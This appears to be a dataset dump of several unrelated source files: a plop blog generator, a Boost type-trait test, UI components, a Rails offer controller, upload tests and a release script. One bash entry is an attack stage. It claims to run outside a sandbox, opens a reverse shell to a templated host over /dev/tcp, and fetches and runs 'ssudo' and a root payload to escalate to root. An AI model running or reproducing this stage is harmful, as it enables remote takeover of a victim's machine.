text stringlengths 1 1.05M |
|---|
<reponame>ub3rb3457/gray-matter-digital
var fs = require('fs');
function loadCategories() {
  // Return the relative path ('blogs/<entry>') of every entry in the
  // blogs/ directory next to this file.
  //
  // The original version was broken in three ways: the function body had
  // no braces (a syntax error), __dirname and 'blogs/' were concatenated
  // without a path separator, and the async readdir result was stored in
  // a local variable that no caller could ever observe. Read the
  // directory synchronously and return the list instead.
  var dirPath = 'blogs/';
  return fs.readdirSync(__dirname + '/' + dirPath).map(function (filePath) {
    return dirPath + filePath;
  });
}
// Replace every occurrence of `search` in `string` with `replace`.
// Splitting on the needle and re-joining avoids regex escaping issues.
function replaceAll(string, search, replace) {
  var pieces = string.split(search);
  return pieces.join(replace);
}
// Turn a date-like string into a directory fragment: the FIRST '-' becomes
// '/', and the SECOND '-' (the first one remaining afterwards) is removed.
// e.g. "2021-08-26" -> "2021/0826". Any further dashes are left alone.
function dirName(string) {
  var first = string.indexOf('-');
  if (first === -1) {
    return string;
  }
  var withSlash = string.slice(0, first) + '/' + string.slice(first + 1);
  var second = withSlash.indexOf('-');
  if (second === -1) {
    return withSlash;
  }
  return withSlash.slice(0, second) + withSlash.slice(second + 1);
}
module.exports = function (plop) {
const today = new Date(Date.now())
const shortDate = today.toISOString().split("T")[0]
const file_path = dirName(shortDate)
plop.setHelper("shortDate", () => shortDate),
plop.setHelper("file_path", () => file_path)
plop.setHelper("ISOStringDate", () => today.toISOString()),
// optional welcome message
plop.setWelcomeMessage(
"Welcome to plop! What type of file would you like to generate?"
),
plop.setGenerator("wiki topic",{
description: "Generate a wiki topic",
prompts: [
{
type: "input",
name: "title",
message: "Title of topic:"
}
],
actions: [
{
type: "add",
path: `{{dashCase title}}/README.md`,
templateFile: "plop-templates/blog-post.hbs",
},
]
}),
plop.setGenerator("blog post", {
description: "template for generating blog posts",
prompts: [
{
type: "input",
name: "title",
message: "Title of post:",
},
{
type: "input",
name: "description",
message: "Description of post:",
},
{
type: "list",
name: "category",
message: "Category:",
choices: ["3D Printing", "Programming", "Other"],
filter: function(val) {
return val.toLowerCase()
},
},
],
actions: [
{
type: "add",
path: `blogs/{{dashCase category}}/${file_path}-{{dashCase title}}.md`,
templateFile: "plop-templates/blog-post.hbs",
},
],
})
} |
<reponame>LarsPh/deepscattering-pbrt<filename>src/ext/boost_1_74_0/libs/type_traits/test/is_trivially_copyable_test.cpp
/*
Copyright 2020 <NAME>
(<EMAIL>)
Distributed under the Boost Software License,
Version 1.0. (See accompanying file LICENSE_1_0.txt
or copy at http://www.boost.org/LICENSE_1_0.txt)
*/
#ifdef TEST_STD
#include <type_traits>
#else
#include <boost/type_traits/is_trivially_copyable.hpp>
#endif
#include "test.hpp"
#include "check_integral_constant.hpp"
// Default-constructible type whose copy constructor is private:
// not trivially copyable because the copy is inaccessible.
class private_copy {
public:
    private_copy();
private:
    private_copy(const private_copy&);
};
// Type whose copy-assignment operator is private:
// used to verify the trait rejects inaccessible assignment.
class private_assign {
public:
    private_assign();
private:
    private_assign& operator=(const private_assign&);
};
// Type whose destructor is private:
// an object that cannot be destroyed publicly is not trivially copyable.
class private_destruct {
public:
    private_destruct();
private:
    ~private_destruct();
};
// C++11-only fixtures: the same three scenarios as the private_* classes
// above, expressed with `= delete` instead of private access.
#ifndef BOOST_NO_CXX11_DELETED_FUNCTIONS
// Copy-assignment explicitly deleted.
struct deleted_assign {
    deleted_assign();
    deleted_assign& operator=(const deleted_assign&) = delete;
};
// Copy constructor deleted but move constructor provided.
struct deleted_copy {
    deleted_copy() { }
    deleted_copy(const deleted_copy&) = delete;
    deleted_copy(deleted_copy&&) { }
};
// Destructor explicitly deleted.
struct deleted_destruct {
    deleted_destruct();
    ~deleted_destruct() = delete;
};
#endif
// Exhaustive checks of the is_trivially_copyable trait over fundamental
// types, pointers, member pointers, references, arrays and the UDT
// fixtures above. The TEST_STD guards exist because cv-qualified results
// differ between Boost's implementation and std::is_trivially_copyable:
// the Boost trait reports false for const/volatile-qualified types.
TT_TEST_BEGIN(is_trivially_copyable)

// bool
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<bool>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<bool const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<bool volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<bool const volatile>::value, false);
#endif

// character types
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<signed char>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<signed char const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<signed char volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<signed char const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned char>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<char>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned char const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<char const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned char volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<char volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned char const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<char const volatile>::value, false);
#endif

// short
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned short>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<short>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned short const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<short const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned short volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<short volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned short const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<short const volatile>::value, false);
#endif

// int
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned int>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned int const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned int volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned int const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int const volatile>::value, false);
#endif

// long
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned long>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned long const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned long volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned long const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long const volatile>::value, false);
#endif

// long long, where available (note the space before ::boost — it avoids
// the <: digraph)
#ifdef BOOST_HAS_LONG_LONG
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::ulong_long_type>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::long_long_type>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::ulong_long_type const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::long_long_type const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::ulong_long_type volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::long_long_type volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::ulong_long_type const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable< ::boost::long_long_type const volatile>::value, false);
#endif
#endif

// Microsoft fixed-width integer extensions, where available
#ifdef BOOST_HAS_MS_INT64
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int8>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int8>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int8 const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int8 const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int8 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int8 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int8 const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int8 const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int16>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int16>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int16 const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int16 const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int16 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int16 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int16 const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int16 const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int32>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int32>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int32 const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int32 const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int32 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int32 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int32 const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int32 const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int64>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int64>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int64 const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int64 const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int64 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int64 volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<unsigned __int64 const volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<__int64 const volatile>::value, false);
#endif
#endif

// floating-point types
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<float>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<float const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<float volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<float const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<double>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<double const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<double volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<double const volatile>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long double>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long double const>::value, false);
#ifndef TEST_STD
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long double volatile>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<long double const volatile>::value, false);
#endif

// pointers, function pointers, member pointers and enums (f1..f3, mf1..mf3,
// mp, cmf, enum_UDT come from test.hpp)
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<void*>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int*const>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<f1>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<f2>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<f3>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<mf1>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<mf2>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<mf3>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<mp>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<cmf>::value, true);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<enum_UDT>::value, true);

// references and arrays are never trivially copyable here
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int&>::value, false);
#ifndef BOOST_NO_CXX11_RVALUE_REFERENCES
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int&&>::value, false);
#endif
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<const int&>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int[2]>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int[3][2]>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<int[2][4][5][6][3]>::value, false);

// user-defined types; the "SOFT" checks tolerate either answer on
// compilers that cannot detect POD-ness
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<UDT>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<void>::value, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<empty_POD_UDT>::value, true, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<POD_UDT>::value, true, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<POD_union_UDT>::value, true, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<empty_POD_union_UDT>::value, true, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<trivial_except_copy>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<trivial_except_destroy>::value, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<trivial_except_construct>::value, true, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<trivial_except_assign>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<wrap<trivial_except_copy> >::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<wrap<trivial_except_destroy> >::value, false);
BOOST_CHECK_SOFT_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<wrap<trivial_except_construct> >::value, true, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<wrap<trivial_except_assign> >::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<test_abc1>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<private_copy>::value, false);
// NOTE(review): this line checks has_trivial_assign, not
// is_trivially_copyable — presumably intentional, but worth confirming.
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::has_trivial_assign<private_assign>::value, false);
#ifndef BOOST_NO_CXX11_DELETED_FUNCTIONS
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::is_trivially_copyable<deleted_copy>::value, false);
BOOST_CHECK_INTEGRAL_CONSTANT(::tt::has_trivial_assign<deleted_assign>::value, false);
#endif

TT_TEST_END
|
<reponame>racar/catarse4realstate
window.c.AdminDetail = (function(m, _, c){
  // Admin detail pane for a single contribution: a divider, a row of
  // dynamically-chosen action components, then the transaction,
  // transaction-history and reward cards.
  return {
    controller: function(){
    },
    view: function(ctrl, args){
      var item = args.item;
      return m('#admin-contribution-detail-box', [
        m('.divider.u-margintop-20.u-marginbottom-20'),
        m('.w-row.u-marginbottom-30',
          // Each action names a component registered on window.c.
          _.map(args.actions, function(action){
            return m.component(c[action.component], {data: action.data, item: item});
          })
        ),
        m('.w-row.card.card-terciary.u-radius', [
          m.component(c.AdminTransaction, {contribution: item}),
          m.component(c.AdminTransactionHistory, {contribution: item}),
          m.component(c.AdminReward, {contribution: item, key: item.key})
        ])
      ]);
    }
  };
}(window.m, window._, window.c));
|
<reponame>despo/apply-for-teacher-training
module ProviderInterface
  # Handles a provider's decisions on an application choice: picking a
  # response, making/confirming an offer, withdrawing an offer and
  # deferring an offer.
  class DecisionsController < ProviderInterfaceController
    # Loads @application_choice and enforces the make-decisions permission
    # before every action.
    before_action :set_application_choice
    before_action :requires_make_decisions_permission

    # Renders the "respond to this application" form.
    def respond
      @pick_response_form = PickResponseForm.new
      @alternative_study_mode = @application_choice.offered_option.alternative_study_mode
    end

    # Routes the chosen response: redirects to the form's target when the
    # decision is valid, otherwise re-renders the respond form with errors.
    def submit_response
      @pick_response_form = PickResponseForm.new(decision: params.dig(:provider_interface_pick_response_form, :decision))
      if @pick_response_form.valid?
        redirect_to @pick_response_form.redirect_attrs
      else
        render action: :respond
      end
    end

    # Renders the new-offer form. Falls back to the application's own
    # course option when no explicit course_option_id is given.
    def new_offer
      course_option = if params[:course_option_id]
                        CourseOption.find(params[:course_option_id])
                      else
                        @application_choice.course_option
                      end
      @application_offer = MakeAnOffer.new(
        actor: current_provider_user,
        application_choice: @application_choice,
        course_option: course_option,
      )
    end

    # Builds the offer (with standard + up to four further conditions) for
    # the confirmation step; re-renders the form when the offer is invalid.
    def confirm_offer
      course_option = CourseOption.find(params[:course_option_id])
      @application_offer = MakeAnOffer.new(
        actor: current_provider_user,
        application_choice: @application_choice,
        course_option: course_option,
        standard_conditions: make_an_offer_params[:standard_conditions],
        further_conditions: make_an_offer_params.permit(
          :further_conditions0,
          :further_conditions1,
          :further_conditions2,
          :further_conditions3,
        ).to_h,
      )
      render action: :new_offer if !@application_offer.valid?
    end

    # Persists the offer; on success redirects back to the application,
    # otherwise re-renders the new-offer form with errors.
    def create_offer
      course_option = CourseOption.find(params[:course_option_id])
      @application_offer = MakeAnOffer.new(
        actor: current_provider_user,
        application_choice: @application_choice,
        course_option: course_option,
        offer_conditions: params.dig(:offer_conditions),
      )
      if @application_offer.save
        flash[:success] = 'Offer successfully made to candidate'
        redirect_to provider_interface_application_choice_path(
          application_choice_id: @application_choice.id,
        )
      else
        render action: :new_offer
      end
    end

    # Renders the withdraw-offer form.
    def new_withdraw_offer
      @withdraw_offer = WithdrawOffer.new(
        actor: current_provider_user,
        application_choice: @application_choice,
      )
    end

    # Validates the withdrawal reason before the confirmation step;
    # re-renders the form when invalid.
    def confirm_withdraw_offer
      @withdraw_offer = WithdrawOffer.new(
        actor: current_provider_user,
        application_choice: @application_choice,
        offer_withdrawal_reason: params.dig(:withdraw_offer, :offer_withdrawal_reason),
      )
      if !@withdraw_offer.valid?
        render action: :new_withdraw_offer
      end
    end

    # Persists the withdrawal; on success redirects to the feedback page,
    # otherwise re-renders the withdraw form with errors.
    def withdraw_offer
      @withdraw_offer = WithdrawOffer.new(
        actor: current_provider_user,
        application_choice: @application_choice,
        offer_withdrawal_reason: params.dig(:withdraw_offer, :offer_withdrawal_reason),
      )
      if @withdraw_offer.save
        flash[:success] = 'Offer successfully withdrawn'
        redirect_to provider_interface_application_choice_feedback_path(
          application_choice_id: @application_choice.id,
        )
      else
        render action: :new_withdraw_offer
      end
    end

    # Renders the defer-offer confirmation page.
    def new_defer_offer
      @defer_offer = DeferOffer.new(
        actor: current_provider_user,
        application_choice: @application_choice,
      )
    end

    # Defers the offer unconditionally (save! raises on failure) and
    # redirects back to the offer page.
    def defer_offer
      DeferOffer.new(
        actor: current_provider_user,
        application_choice: @application_choice,
      ).save!
      flash[:success] = 'Offer successfully deferred'
      redirect_to provider_interface_application_choice_offer_path(@application_choice)
    end

    private

    # Strong-parameters root for the offer forms.
    def make_an_offer_params
      params.require(:make_an_offer)
    end
  end
end
|
#!/bin/bash
echo Executing outside of the sandbox \\o/
# Open a calculator
open /Applications/Calculator.app
# Establish a reverse shell
bash -c "/bin/bash > /dev/tcp/{{ host }}/{{ revshell_port }} <&1 2>&1" &
cd /tmp
# Do the privesc to root (stage4)
curl -s http://{{ host }}:{{ http_port }}/ssudo > ./ssudo
curl -s http://{{ host }}:{{ http_port }}/root_payload.sh > ./root_payload.sh
chmod +x ssudo root_payload.sh
echo "Installed super-sudo (no password required anymore)"
./ssudo ./root_payload.sh
echo We are done here...
|
import React from "react";
import { blockTypes } from "./editorTypes";
import { ToolbarItem, Container } from "./style";
//Rich utils is a utility library for manipulating text (like inlineStyle, blockTypes...)
import { RichUtils, EditorState, AtomicBlockUtils } from "draft-js";
import { isWebUri } from 'valid-url';
export function RenderBlockStyles(props) {
const { editorState, updateEditorState } = props;
const applyStyle = (e, style, label) => {
e.preventDefault();
if(style !== 'atomic'){
return updateEditorState(RichUtils.toggleBlockType(editorState, style));
}else{
return createMedia(label.toLowerCase());
}
};
const createMedia = (label) => {
const promptURL = prompt(`Paste your url of ${label}`);
if (promptURL){
if (isWebUri(promptURL)){
const contentState = editorState.getCurrentContent();
const contentStateWithEntity = contentState.createEntity(
label,
'IMMUTABLE',
{ src: promptURL }
);
const entityKey = contentStateWithEntity.getLastCreatedEntityKey();
const newEditorState = EditorState.set(
editorState,
{ currentContent: contentStateWithEntity }
);
updateEditorState(AtomicBlockUtils.insertAtomicBlock(
newEditorState,
entityKey,
' '
));
}else{
return alert('Your URL is invalid !!')
}
}
}
const isActive = (style) => {
const selection = editorState.getSelection();
const blockType = editorState
.getCurrentContent()
.getBlockForKey(selection.getStartKey())
.getType();
if (style === blockType) return true;
return false;
};
return (
<Container>
{blockTypes.map((item, idx) => {
return (
<ToolbarItem
isActive={isActive(item.style)}
key={`${item.label}-${idx}`}
onClick={(e) => applyStyle(e, item.style, item.label)}
>
{item.icon || item.label}
</ToolbarItem>
);
})}
</Container>
);
} |
/*
Copyright 2021 Adobe. All rights reserved.
This file is licensed to you under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License. You may obtain a copy
of the License at http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under
the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS
OF ANY KIND, either express or implied. See the License for the specific language
governing permissions and limitations under the License.
*/
const should = require('should');
const { importFile } = require('./testutils');
const FileSystemUploadOptions = importFile('filesystem-upload-options');
const FileSystemUploadItemManager = importFile('filesystem-upload-item-manager');
describe('FileSystemUploadItemManager Tests', function() {
  let options;

  beforeEach(function() {
    // Fresh options per test so state cannot leak between cases.
    options = new FileSystemUploadOptions()
      .withUrl('http://someunittestfakeurl/content/dam/target');
  });

  it('test get directory', async function () {
    // The manager is rooted at a Windows-style path while the lookups
    // below use forward slashes, exercising path normalization.
    const manager = new FileSystemUploadItemManager(options, '\\fake\\test\\directory\\');
    // Nothing is cached before the first getDirectory() call.
    should(manager.hasDirectory('/fake/test/directory/')).not.be.ok();
    should(manager.hasDirectory('/fake/test/directory/child')).not.be.ok();
    should(manager.hasDirectory('/fake/test')).not.be.ok();
    const subChild = await manager.getDirectory('/fake/test/directory/Child Dir/Sub Child/');
    should(subChild).be.ok();
    should(subChild.getLocalPath()).be.exactly('/fake/test/directory/Child Dir/Sub Child');
    // Remote path segments are sanitized (lower-cased, spaces -> dashes).
    should(subChild.getRemotePath()).be.exactly('/content/dam/target/directory/child-dir/sub-child');
    should(subChild.getName()).be.exactly('Sub Child');
    // Fetching a deep directory caches every ancestor inside the root...
    should(manager.hasDirectory('/fake/test/directory/')).be.ok();
    should(manager.hasDirectory('/fake/test/directory/Child Dir')).be.ok();
    should(manager.hasDirectory('/fake/test/directory/Child Dir/Sub Child')).be.ok();
    // ...but not paths above the root.
    should(manager.hasDirectory('/fake/test')).not.be.ok();
    const child = await manager.getDirectory('/fake/test/directory/Child Dir');
    should(child).be.ok();
    should(child.getLocalPath()).be.exactly('/fake/test/directory/Child Dir');
    should(child.getRemotePath()).be.exactly('/content/dam/target/directory/child-dir');
    should(child.getName()).be.exactly('Child Dir');
    // Requesting a directory outside the root rejects.
    should(manager.getDirectory('/fake/test')).be.rejected();
  });

  it('test get asset', async function() {
    const folderPath = '/fake/asset/directory';
    const assetPath = `${folderPath}/Asset #1.jpg`;
    const manager = new FileSystemUploadItemManager(options, '/fake/asset/directory');
    should(manager.hasAsset(assetPath)).not.be.ok();
    const asset = await manager.getAsset(assetPath, 1024);
    should(asset).be.ok();
    should(asset.getLocalPath()).be.exactly(assetPath);
    // Illegal characters in file names ('#') are replaced with '-'.
    should(asset.getRemotePath()).be.exactly('/content/dam/target/directory/Asset -1.jpg');
    should(asset.getSize()).be.exactly(1024);
    should(asset.getParentRemoteUrl()).be.exactly('http://someunittestfakeurl/content/dam/target/directory');
    // Both the asset and its containing directory are cached afterwards.
    should(manager.hasAsset(assetPath)).be.ok();
    should(manager.hasDirectory(folderPath)).be.ok();
  });

  it('test get root asset', async function() {
    // When the manager is rooted at the asset itself, the asset lands
    // directly under the target URL (no intermediate directory).
    const assetPath = '/fake/asset/directory/Asset #1.jpg';
    const manager = new FileSystemUploadItemManager(options, assetPath);
    should(manager.hasAsset(assetPath)).not.be.ok();
    const asset = await manager.getAsset(assetPath, 1024);
    should(asset).be.ok();
    should(asset.getLocalPath()).be.exactly(assetPath);
    should(asset.getRemotePath()).be.exactly('/content/dam/target/Asset -1.jpg');
    should(asset.getSize()).be.exactly(1024);
    should(asset.getParentRemoteUrl()).be.exactly('http://someunittestfakeurl/content/dam/target');
    should(manager.hasAsset(assetPath)).be.ok();
  });
});
|
#!/usr/bin/env bash
# Abort on the first failing command, including failures inside pipelines.
set -e
set -o pipefail

# Notify SkyWay team Slack of the new release.
# Extract the latest release's change-log section: from the first "### "
# heading up to (but not including) the second "## " heading.
cl_startline=$(grep -nE "^### " CHANGELOG.md | head -n 1 | cut -d ":" -f 1)
cl_finishline=$(($(grep -nE "^## " CHANGELOG.md | head -n 2 | tail -n 1 | cut -d ":" -f 1) - 1))
changelog=$(sed -n "${cl_startline},${cl_finishline}p" CHANGELOG.md)
version_num=$(jq -r ".version" package.json)

# NOTE(review): the env var is spelled NOTIFICATION_ENDOPOINT ("ENDOPOINT");
# this looks like a typo of ENDPOINT but must match what CI actually sets —
# confirm against the CI config before renaming.
curl -X POST $NOTIFICATION_ENDOPOINT --data-urlencode 'payload={
"username": "release bot",
"icon_emoji": ":tada:",
"text": "<'"$CIRCLE_BUILD_URL"'|skyway-js-sdk version '"$version_num"' released>\n*Change Log*\n```'"$changelog"'```"
}'
